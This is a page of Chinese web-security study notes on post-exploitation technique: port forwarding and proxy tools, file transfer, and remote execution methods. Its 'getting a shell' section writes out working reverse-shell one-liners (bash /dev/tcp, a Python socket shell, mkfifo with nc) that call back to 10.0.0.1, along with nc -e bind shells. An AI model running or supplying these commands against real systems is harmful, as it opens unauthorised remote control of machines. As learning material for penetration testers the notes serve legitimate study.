返回介绍
文江博客 开发文档 Web 安全学习笔记 v1.0 文章详情

6.4. 综合技巧

发布于 2024-02-07 20:47:54 字数 1841 浏览 0 评论 0 收藏 0

6.4. 综合技巧

6.4.1. 端口转发

  • windows
    • lcx
    • netsh
  • linux
    • portmap
    • iptables
  • socket代理
    • Win: xsocks
    • Linux: proxychains
  • 基于http的转发与socket代理(低权限下的渗透)
    • 端口转发: tunna
    • socks代理: reGeorg
  • ssh通道
    • 端口转发
    • socks

6.4.2. 获取shell

  • 常规shell反弹
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
  • 突破防火墙的imcp_shell反弹
  • 正向shell
nc -e /bin/sh -lp 1234
nc.exe -e cmd.exe -lp 1234

6.4.3. 内网文件传输

  • windows下文件传输
    • powershell
    • vbs脚本文件
    • bitsadmin
    • 文件共享
    • 使用telnet接收数据
    • hta
  • linux下文件传输
    • python
    • wget
    • tar + ssh
    • 利用dns传输数据
  • 文件编译
    • powershell将exe转为txt,再txt转为exe

6.4.4. 远程连接 && 执行程序

  • at&schtasks
  • psexec
  • wmic
  • wmiexec.vbs
  • smbexec
  • powershell remoting
  • SC创建服务执行
  • schtasks
  • SMB+MOF || DLL Hijacks
  • PTH + compmgmt.msc

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
列表为空,暂无数据
    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文